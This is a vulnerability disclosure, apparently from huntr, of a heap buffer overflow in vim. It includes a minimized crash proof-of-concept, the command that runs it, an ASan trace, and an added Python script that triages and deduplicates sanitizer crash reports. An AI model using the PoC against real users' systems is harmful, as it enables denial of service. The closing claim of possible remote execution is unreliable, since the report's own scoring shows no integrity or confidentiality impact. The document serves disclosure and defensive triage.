Heap-based Buffer Overflow in vim/vim

Published: 2021-10-05 13:53:31
Reporter: thecrott
Source: www.huntr.dev (huntr ID 5CDBC168-6BA1-4BC2-BA6C-28BE12166A53)

CVSS3: 5.5 Medium
  Attack Vector:          LOCAL
  Attack Complexity:      LOW
  Privileges Required:    NONE
  User Interaction:       REQUIRED
  Scope:                  UNCHANGED
  Confidentiality Impact: NONE
  Integrity Impact:       NONE
  Availability Impact:    HIGH
  Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVSS2: 4.3 Medium
  Access Vector:          NETWORK
  Access Complexity:      MEDIUM
  Authentication:         NONE
  Confidentiality Impact: NONE
  Integrity Impact:       NONE
  Availability Impact:    PARTIAL
  Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

EPSS: 0.001 Low (percentile 41.0%)

When fuzzing vim commit 56858e4ed (works with latest build) with clang 12 and ASan, I discovered a heap buffer overflow.

Proof of Concept

Here is the minimized PoC:

/\%.v
5/
c

Extract it, then run the crafted file with this command:
vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!

ASan stack trace:

aldo@vps:~/vim/src$ ASAN_OPTIONS=symbolize=1 ASAN_SYMBOLIZER_PATH=/usr/bin/llvm-symbolizer ./vim -u NONE -X -Z -e -s -S vimpoc1 -c :qa!
=================================================================
==2889370==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000013d00 at pc 0x00000049a4ef bp 0x7ffffffdbf30 sp 0x7ffffffdb6f8
READ of size 4 at 0x621000013d00 thread T0
    #0 0x49a4ee in __asan_memmove (/home/aldo/vim/src/vim+0x49a4ee)
    #1 0x4d02e0 in vim_memsave /home/aldo/vim/src/alloc.c:597:2
    #2 0x75c5f58 in u_save_line /home/aldo/vim/src/undo.c:373:16
    #3 0x757d2c4 in u_saveline /home/aldo/vim/src/undo.c:3477:9
    #4 0x757a246 in u_save /home/aldo/vim/src/undo.c:257:2
    #5 0x43002fd in op_shift /home/aldo/vim/src/ops.c:145:9
    #6 0x22d91b1 in ex_operators /home/aldo/vim/src/ex_docmd.c:7743:6
    #7 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2
    #8 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17
    #9 0x5c1b974 in do_source /home/aldo/vim/src/scriptfile.c:1406:5
    #10 0x5bffda5 in cmd_source /home/aldo/vim/src/scriptfile.c:971:14
    #11 0x5bfdd3f in ex_source /home/aldo/vim/src/scriptfile.c:997:2
    #12 0x209f37a in do_one_cmd /home/aldo/vim/src/ex_docmd.c:2611:2
    #13 0x201ebd1 in do_cmdline /home/aldo/vim/src/ex_docmd.c:1000:17
    #14 0x203af9a in do_cmdline_cmd /home/aldo/vim/src/ex_docmd.c:594:12
    #15 0x93c5f55 in exe_commands /home/aldo/vim/src/main.c:3081:2
    #16 0x93a0249 in vim_main2 /home/aldo/vim/src/main.c:773:2
    #17 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12
    #18 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x41fe2d in _start (/home/aldo/vim/src/vim+0x41fe2d)

0x621000013d00 is located 0 bytes to the right of 4096-byte region [0x621000012d00,0x621000013d00)
allocated by thread T0 here:
    #0 0x49aced in malloc (/home/aldo/vim/src/vim+0x49aced)
    #1 0x4cd2ac in lalloc /home/aldo/vim/src/alloc.c:244:11
    #2 0x4ccfa3 in alloc /home/aldo/vim/src/alloc.c:151:12
    #3 0x9426f31 in mf_alloc_bhdr /home/aldo/vim/src/memfile.c:884:21
    #4 0x941b675 in mf_new /home/aldo/vim/src/memfile.c:376:26
    #5 0x387b40b in ml_new_data /home/aldo/vim/src/memline.c:4068:15
    #6 0x3867f37 in ml_open /home/aldo/vim/src/memline.c:394:15
    #7 0x694e5f in open_buffer /home/aldo/vim/src/buffer.c:190:9
    #8 0x93ae2a2 in create_windows /home/aldo/vim/src/main.c:2851:9
    #9 0x939c80d in vim_main2 /home/aldo/vim/src/main.c:704:5
    #10 0x932bfd4 in main /home/aldo/vim/src/main.c:425:12
    #11 0x7ffff78260b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vim/src/vim+0x49a4ee) in __asan_memmove
Shadow bytes around the buggy address:
  0x0c427fffa750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffa790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c427fffa7a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffa7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2889370==ABORTING
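Triaging a fuzzer's ASan output is the first defensive step after a report like this: pull out the bug class, the faulting access, the first frame in program code and the allocation site, then bucket crashes that share a stack so duplicates are not filed twice. The parser below is an added example, not code from the huntr report or from the vim project. It runs over an abridged copy of the trace above, embedded as a constructed sample; the sanitizer-frame filter, the signature depth and the use of file basenames are assumptions of this example rather than anything the report specifies.

```python
import hashlib
import os
import re

# Constructed sample input: an abridged copy of the ASan report quoted above
# (frame lists shortened; addresses and source locations are the report's own).
SAMPLE_REPORT = """\
==2889370==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000013d00 at pc 0x00000049a4ef bp 0x7ffffffdbf30 sp 0x7ffffffdb6f8
READ of size 4 at 0x621000013d00 thread T0
    #0 0x49a4ee in __asan_memmove (/home/aldo/vim/src/vim+0x49a4ee)
    #1 0x4d02e0 in vim_memsave /home/aldo/vim/src/alloc.c:597:2
    #2 0x75c5f58 in u_save_line /home/aldo/vim/src/undo.c:373:16
    #3 0x757d2c4 in u_saveline /home/aldo/vim/src/undo.c:3477:9
    #4 0x757a246 in u_save /home/aldo/vim/src/undo.c:257:2
    #5 0x43002fd in op_shift /home/aldo/vim/src/ops.c:145:9

0x621000013d00 is located 0 bytes to the right of 4096-byte region [0x621000012d00,0x621000013d00)
allocated by thread T0 here:
    #0 0x49aced in malloc (/home/aldo/vim/src/vim+0x49aced)
    #1 0x4cd2ac in lalloc /home/aldo/vim/src/alloc.c:244:11
    #2 0x4ccfa3 in alloc /home/aldo/vim/src/alloc.c:151:12
    #3 0x9426f31 in mf_alloc_bhdr /home/aldo/vim/src/memfile.c:884:21

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aldo/vim/src/vim+0x49a4ee) in __asan_memmove
"""

ERROR_RE = re.compile(
    r"==\d+==ERROR: AddressSanitizer: (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at", re.M)
FRAME_RE = re.compile(r"^[ \t]*#\d+ 0x[0-9a-f]+ in (?P<func>\S+) (?P<loc>\S+)", re.M)
LOC_RE = re.compile(r"^(?P<file>.+?):(?P<line>\d+)(?::\d+)?$")
REGION_RE = re.compile(
    r"is located (?P<dist>\d+) bytes to the (?P<side>left|right) of (?P<size>\d+)-byte region")
# Assumed prefixes of frames that belong to the sanitizer runtime, not the program.
RUNTIME_PREFIXES = ("__asan", "__interceptor", "__sanitizer")


def _parse_frames(chunk):
    """Turn '#N 0xADDR in func file:line:col' lines into dicts."""
    frames = []
    for m in FRAME_RE.finditer(chunk):
        loc = m.group("loc")
        lm = LOC_RE.match(loc)
        if lm:
            frames.append({"func": m.group("func"), "file": lm.group("file"),
                           "line": int(lm.group("line"))})
        else:  # unsymbolized frame such as '(/path/vim+0x49a4ee)'
            frames.append({"func": m.group("func"), "file": loc.strip("()"), "line": None})
    return frames


def parse_asan_report(text):
    """Extract bug class, access, faulting stack, allocation stack and region info."""
    err = ERROR_RE.search(text)
    if not err:
        raise ValueError("not an AddressSanitizer error report")
    access = ACCESS_RE.search(text)
    region = REGION_RE.search(text)
    # The allocation (or free) stack follows the "allocated by"/"freed by" line;
    # everything before it belongs to the stack of the faulting access.
    split = re.search(r"^(allocated|freed) by thread", text, re.M)
    summary = text.find("SUMMARY:")
    end = summary if summary >= 0 else len(text)
    access_part = text[:split.start()] if split else text[:end]
    alloc_part = text[split.start():end] if split else ""
    return {
        "kind": err.group("kind"),
        "address": err.group("addr"),
        "access": access.group("op") if access else None,
        "size": int(access.group("size")) if access else None,
        "stack": _parse_frames(access_part),
        "alloc_stack": _parse_frames(alloc_part),
        "region_size": int(region.group("size")) if region else None,
        "distance": int(region.group("dist")) if region else None,
        "side": region.group("side") if region else None,
    }


def user_frames(frames):
    """Drop sanitizer-runtime frames so the signature starts in program code."""
    return [f for f in frames if not f["func"].startswith(RUNTIME_PREFIXES)]


def signature_key(report, depth=3):
    """Bug class, access type and the top `depth` program frames, build-path independent."""
    parts = [report["kind"], report["access"] or "?"]
    for f in user_frames(report["stack"])[:depth]:
        parts.append("%s:%s:%s" % (f["func"], os.path.basename(f["file"]), f["line"]))
    return "|".join(parts)


def crash_signature(report, depth=3):
    """Short stable hash used to bucket fuzzer crashes that share a root cause."""
    return hashlib.sha256(signature_key(report, depth).encode()).hexdigest()[:16]


if __name__ == "__main__":
    r = parse_asan_report(SAMPLE_REPORT)
    print("%s: %s of %d bytes, %d bytes to the %s of a %d-byte heap region" % (
        r["kind"], r["access"], r["size"], r["distance"], r["side"], r["region_size"]))
    print("first program frame:", user_frames(r["stack"])[0])
    print("outermost allocation frame:", r["alloc_stack"][-1])
    print("signature:", crash_signature(r), "=", signature_key(r))
```

Run as a script it prints the one-line triage summary and the dedup key for the sample; in a fuzzing campaign the same functions would be applied to every crash log, and two reports with equal `crash_signature` values are treated as the same bug until the fix is verified. Using basenames in the key keeps signatures stable across build directories, and skipping `__asan_*` frames avoids bucketing every memmove-related overflow together.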

💥 Impact

This vulnerability is capable of crashing the software, bypassing protection mechanisms, modifying memory, and possibly allowing remote execution.
